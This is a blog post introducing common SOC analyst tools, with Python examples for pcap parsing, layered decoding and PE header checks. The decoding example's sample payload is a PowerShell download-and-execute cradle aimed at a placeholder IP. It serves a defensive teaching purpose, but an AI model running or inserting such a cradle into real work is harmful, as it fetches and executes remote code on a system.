Essential tools for SOC Analysts

Salim Doğan CESUR
May 2, 2022

The tools listed here are well-known tools in their own areas, and most of them turn up in SOC analysts' toolkits. This post does not cover how to use them or their detailed features; it is meant as a starting point for anyone getting into SOC analysis.

Wireshark (tshark)

Wireshark is the most widely used network protocol analyzer. It captures live traffic (or opens an existing capture) and dissects it protocol by protocol, so during an investigation you can see exactly what is happening on the network, from a suspicious DNS query to the full content of an unencrypted session. tshark is the command-line version of Wireshark: it applies the same dissectors and display filters, but runs in a terminal, which makes it usable on headless servers and in scripts. Both ship together in the Wireshark package.

tcpdump

tcpdump is a command-line packet capture tool built on libpcap. It captures TCP/IP and other packets on an interface of the host it runs on, filters them with BPF expressions (for example `tcpdump -i eth0 port 4444`) and can write them to a pcap file with `-w` for later analysis in Wireshark. It is available on Linux, the BSDs and macOS rather than being Linux-specific. Installation instructions and documentation are on the tcpdump project site.
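The file format that `tcpdump -w` writes and Wireshark reads is simple enough to parse by hand, and doing so once shows what the dissectors in these tools actually do. The following is an added example written for this post, not code from the original article or from the Wireshark or tcpdump projects. It builds a small classic-format pcap in memory from constructed frames (a TCP handshake to a suspicious port, one HTTPS connection and an ARP frame; none of it is real traffic), then reads it back, dissects Ethernet/IPv4/TCP and answers two typical analyst questions: who talks to whom, and which hosts sent a bare SYN to a given port.

```python
import struct
from collections import Counter

PCAP_MAGIC = 0xA1B2C3D4          # classic pcap magic (microsecond timestamps)
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
TCP_SYN, TCP_ACK = 0x02, 0x10


def build_frame(src_ip, dst_ip, sport, dport, flags):
    """Build an Ethernet/IPv4/TCP frame with no payload (checksums left zero)."""
    eth = bytes(12) + struct.pack("!H", ETHERTYPE_IPV4)      # MACs are all-zero placeholders
    src = bytes(int(o) for o in src_ip.split("."))
    dst = bytes(int(o) for o in dst_ip.split("."))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 1, 0, 64, IPPROTO_TCP, 0, src, dst)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags, 65535, 0, 0)
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in the classic libpcap file format (what tcpdump -w writes)."""
    header = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(
        struct.pack("<IIII", 1651500000 + i, 0, len(f), len(f)) + f
        for i, f in enumerate(frames)
    )
    return header + records


def parse_pcap(data):
    """Yield (timestamp, frame) for each record; handles both byte orders."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic == PCAP_MAGIC:
        end = "<"
    elif magic == 0xD4C3B2A1:           # file written on a big-endian host
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(end + "IHHiIII", data[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("unsupported link type %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        frame = data[off:off + incl_len]
        if len(frame) != incl_len:
            raise ValueError("truncated packet record")
        off += incl_len
        yield ts_sec + ts_usec / 1e6, frame


def dissect_tcp(frame):
    """Return (src, sport, dst, dport, flags) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                 # IPv4 header length honours options
    if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
    return src, sport, dst, dport, ip[ihl + 13]


def conversation_counts(data):
    """Packets per (src, dst, dport): a rough equivalent of Wireshark's Conversations view."""
    counts = Counter()
    for _, frame in parse_pcap(data):
        hit = dissect_tcp(frame)
        if hit:
            src, _, dst, dport, _ = hit
            counts[(src, dst, dport)] += 1
    return counts


def syn_packets(data, port):
    """Bare SYNs to a port: the display filter tcp.flags.syn==1 && tcp.flags.ack==0 && tcp.dstport==port."""
    hits = []
    for _, frame in parse_pcap(data):
        hit = dissect_tcp(frame)
        if hit and hit[3] == port and hit[4] & (TCP_SYN | TCP_ACK) == TCP_SYN:
            hits.append(hit)
    return hits


# Constructed sample capture (not real traffic): a three-way handshake to a
# suspicious port, one HTTPS connection, and an ARP frame that must be skipped.
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.5", "203.0.113.7", 49152, 4444, TCP_SYN),
    build_frame("203.0.113.7", "10.0.0.5", 4444, 49152, TCP_SYN | TCP_ACK),
    build_frame("10.0.0.5", "203.0.113.7", 49152, 4444, TCP_ACK),
    build_frame("10.0.0.5", "198.51.100.2", 49153, 443, TCP_SYN),
    bytes(12) + struct.pack("!H", 0x0806) + bytes(28),
])

if __name__ == "__main__":
    for (src, dst, dport), n in conversation_counts(SAMPLE_PCAP).most_common():
        print("%s -> %s:%d  %d packets" % (src, dst, dport, n))
    print("bare SYNs to 4444:", syn_packets(SAMPLE_PCAP, 4444))
```

The same questions are one-liners in the real tools (`tshark -r capture.pcap -q -z conv,tcp` and `tshark -r capture.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==0 && tcp.dstport==4444"`); the value of writing the parser once is knowing what those filters match on. Note that the parser handles only the classic pcap format and Ethernet link type; modern Wireshark writes pcapng by default, so pass `-F pcap` when you need a file this code can read.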

CyberChef

CyberChef is a browser-based tool from GCHQ that SOC analysts use to decode and transform data. It converts between formats such as hex, Base64 and binary, so encoded strings found in an attacker's commands or payloads can be unwrapped quickly, and individual operations can be chained into a "recipe" that peels off several layers at once. Beyond format conversion it has many more operations (hashing, XOR, compression, parsing of common file formats and so on). It can be used online at the project's site or downloaded and run as a local copy, which is the safer choice when the data you are pasting in is sensitive.
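A recurring SOC task that CyberChef's recipes (and its "Magic" operation) handle is an attacker string wrapped in several encodings, for instance a PowerShell `-EncodedCommand` payload, which is Base64 of UTF-16LE text, wrapped again in hex by a logging pipeline. The following is an added example written for this post, not CyberChef's code or anything from the original article. It implements a small automatic decoder: each layer is tried with "From Binary", "From Hex" and "From Base64" in that order (hex before Base64, because every hex string is also a valid Base64 string), the result is accepted only if it turns into printable text, UTF-16LE output is recognised and decoded, and the recipe that worked is reported. The sample payload is constructed in the block and is not from a real incident.

```python
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable)


def looks_printable(text, threshold=0.95):
    """True when nearly every character is printable ASCII (a decoded layer should be)."""
    return bool(text) and sum(c in PRINTABLE for c in text) / len(text) >= threshold


def is_utf16le(raw):
    """Even bytes printable ASCII, odd bytes zero: the shape of PowerShell -EncodedCommand text."""
    return (len(raw) >= 4 and len(raw) % 2 == 0
            and all(raw[i] == 0 for i in range(1, len(raw), 2))
            and all(0x20 <= raw[i] < 0x7F or raw[i] in (9, 10, 13) for i in range(0, len(raw), 2)))


def from_binary(s):
    t = "".join(s.split())
    if len(t) < 8 or len(t) % 8 or not re.fullmatch(r"[01]+", t):
        return None
    return bytes(int(t[i:i + 8], 2) for i in range(0, len(t), 8))


def from_hex(s):
    t = "".join(s.split())
    if len(t) < 4 or len(t) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", t):
        return None
    return bytes.fromhex(t)


def from_base64(s):
    t = "".join(s.split())
    if len(t) < 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", t):
        return None
    try:
        return base64.b64decode(t + "=" * (-len(t) % 4), validate=True)  # tolerate stripped padding
    except binascii.Error:
        return None


# Order matters: a binary string is valid hex, and a hex string is valid Base64.
DECODERS = [("From Binary", from_binary), ("From Hex", from_hex), ("From Base64", from_base64)]


def bytes_to_text(raw):
    """Return (text, extra_step) if raw is readable text, else None."""
    if is_utf16le(raw):
        return raw.decode("utf-16-le"), "Decode text (UTF-16LE)"
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return (text, None) if looks_printable(text) else None


def auto_decode(data, max_layers=10):
    """Peel encoding layers until nothing decodes to printable text; return (text, recipe)."""
    recipe, current = [], data
    for _ in range(max_layers):
        for name, decoder in DECODERS:
            raw = decoder(current)
            if raw is None:
                continue
            converted = bytes_to_text(raw)
            if converted is None:
                continue                      # decodable, but garbage: try the next decoder
            current, extra = converted
            recipe.append(name)
            if extra:
                recipe.append(extra)
            break
        else:
            break                             # no decoder produced text: this is the plaintext
    return current, recipe


def encode_sample(text):
    """Layer the encodings the way a logged PowerShell one-liner might appear: UTF-16LE -> Base64 -> hex."""
    b64 = base64.b64encode(text.encode("utf-16-le")).decode("ascii")
    return b64.encode("ascii").hex()


# Constructed sample (documentation IP address, not a real incident).
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
SAMPLE = encode_sample(PLAINTEXT)

if __name__ == "__main__":
    text, recipe = auto_decode(SAMPLE)
    print("recipe :", " -> ".join(recipe))
    print("result :", text)
```

The printable-text check is what keeps the decoder from running forever: a short English word such as "Test" is valid Base64 but decodes to bytes that are not text, so it is left alone. The same ambiguity is why CyberChef's Magic operation scores candidate outputs rather than trusting the first decoder that does not error.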

Process Monitor (ProcMon)

Process Monitor is a Windows-only tool from Microsoft's Sysinternals suite. It shows file system, registry and process/thread activity in real time, with the process, operation, path and result of each event, and its filters let you narrow thousands of events down to what a single suspicious process did. That makes it much easier to work out what a sample does on a Windows system.

Process Hacker

Process Hacker is a process viewer and system monitor, closer to Process Explorer than to ProcMon. It lists the running processes on the machine with their threads, loaded modules, handles, memory regions and network connections, alongside overall system performance information, which makes it useful for watching malware while it runs. The project has since been continued under the name System Informer.

PEiD

PEiD is a tool for analysing PE (Portable Executable) files. It is mainly used for signature-based identification of the packer, protector or compiler a file was built with, by matching byte patterns at the entry point against its signature database. PEiD itself has not been updated for many years, but its signature format lives on in other tools.

ProcDOT

ProcDOT is useful for malware analysis rather than detection. It correlates a Process Monitor log with a packet capture and turns a sample's system and network activity into an interactive graph, so the chain of spawned processes, dropped files and connections can be followed visually. Builds are available for Windows and Linux.

pestudio

pestudio is widely used for the first static look at a suspicious file before it is run. For a PE file it shows indicators (suspicious header values, blacklisted strings, suspicious imports), imported libraries and functions, strings, resources, certificate information and a VirusTotal score, among other things.
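Several of the checks PEiD and pestudio run on a PE file come straight from its headers, and parsing those headers once makes their output easier to interpret. The following is an added example written for this post, not code from PEiD, pestudio or the original article. It reads the DOS header, PE signature, COFF and optional headers and the section table, computes the Shannon entropy of each section, and raises the kind of indicators pestudio lists: an entry point outside `.text`, section names left behind by well-known packers, near-random section contents, and sections that are both writable and executable. Real PEiD goes further and matches byte signatures at the entry point; this example stops at the header checks. The two input files are minimal PE images constructed in memory (a "clean" one and a UPX-style packed one); they are test data, not runnable programs.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone

MACHINES = {0x14C: "x86", 0x8664: "x64"}
SCN_CNT_CODE, SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040
SCN_MEM_EXECUTE, SCN_MEM_READ, SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
# Section names left behind by common packers/protectors (name check only).
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite",
                        "MPRESS1", "MPRESS2", ".vmp0", ".vmp1", ".themida"}


def shannon_entropy(data):
    """Bits per byte; close to 8.0 means uniformly random (compressed or encrypted)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data):
    """Read the headers pestudio shows first: machine, timestamp, entry point, sections."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)   # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rsize, raw_ptr, _, _, _, _, flags = \
            struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[raw_ptr:raw_ptr + rsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "rsize": rsize,
                         "flags": flags, "entropy": shannon_entropy(raw)})
    return {"machine": MACHINES.get(machine, hex(machine)),
            "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
            "compiled": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
            "characteristics": characteristics, "entry_point": entry_rva, "sections": sections}


def indicators(pe):
    """Static red flags of the kind pestudio lists under 'indicators'."""
    found = []
    ep = pe["entry_point"]
    home = next((s for s in pe["sections"]
                 if s["vaddr"] <= ep < s["vaddr"] + max(s["vsize"], s["rsize"])), None)
    if home is None:
        found.append("entry point 0x%x lies outside every section" % ep)
    elif home["name"] != ".text":
        found.append("entry point in section %s instead of .text" % home["name"])
    for s in pe["sections"]:
        if s["name"] in PACKER_SECTION_NAMES:
            found.append("section name %s belongs to a known packer" % s["name"])
        if s["entropy"] > 7.0:
            found.append("section %s has high entropy (%.2f), likely packed or encrypted"
                         % (s["name"], s["entropy"]))
        if s["flags"] & SCN_MEM_EXECUTE and s["flags"] & SCN_MEM_WRITE:
            found.append("section %s is writable and executable" % s["name"])
    return found


def build_pe(sections, entry_rva, machine=0x14C):
    """Construct a minimal PE32 image in memory (test input only, not a runnable program)."""
    opt_size, headers_end = 0xE0, 0x200
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, len(sections), 1651500000, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<HBBIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    headers, bodies, raw_ptr = b"", b"", headers_end
    for name, vaddr, vsize, raw, flags in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, vaddr,
                               len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, flags)
        bodies += raw
        raw_ptr += len(raw)
    return (dos + coff + optional + headers).ljust(headers_end, b"\0") + bodies


# Constructed inputs: repetitive "code" (low entropy) versus a UPX-style layout whose
# UPX1 section holds stand-in "compressed" data with maximal entropy.
CODE = b"\x55\x89\xe5\x83\xec\x10\x31\xc0\xc9\xc3" * 32
CLEAN_PE = build_pe([(".text", 0x1000, len(CODE), CODE, SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
                     (".data", 0x2000, 0x100, b"hello\0" * 16, SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE)],
                    entry_rva=0x1000)
PACKED_PE = build_pe([("UPX0", 0x1000, 0x4000, b"", 0xE0000080),
                      ("UPX1", 0x5000, 0x1000, bytes(range(256)) * 16, 0xE0000040)],
                     entry_rva=0x5000)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("packed", PACKED_PE)):
        pe = parse_pe(image)
        print(label, pe["machine"], pe["format"], "compiled", pe["compiled"])
        for s in pe["sections"]:
            print("  %-8s rva=0x%05x raw=%5d entropy=%.2f" % (s["name"], s["vaddr"], s["rsize"], s["entropy"]))
        for flag in indicators(pe):
            print("  !", flag)
```

None of these indicators is proof on its own: legitimate installers and games ship packed, and a .NET or Go binary has an unusual section layout without being malicious. They are the prompts that tell you the file deserves a closer look, which is exactly how pestudio's indicator list should be read.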

Cuckoo

Cuckoo Sandbox is an open-source automated malware analysis system. It runs the sample you submit in an isolated virtual machine and reports what it did (files, registry, processes, network traffic and API calls), so you get results without infecting your own host. The original Cuckoo project is no longer actively maintained; the CAPE fork (CAPEv2) carries the same idea forward.

Thanks for taking the time to read.
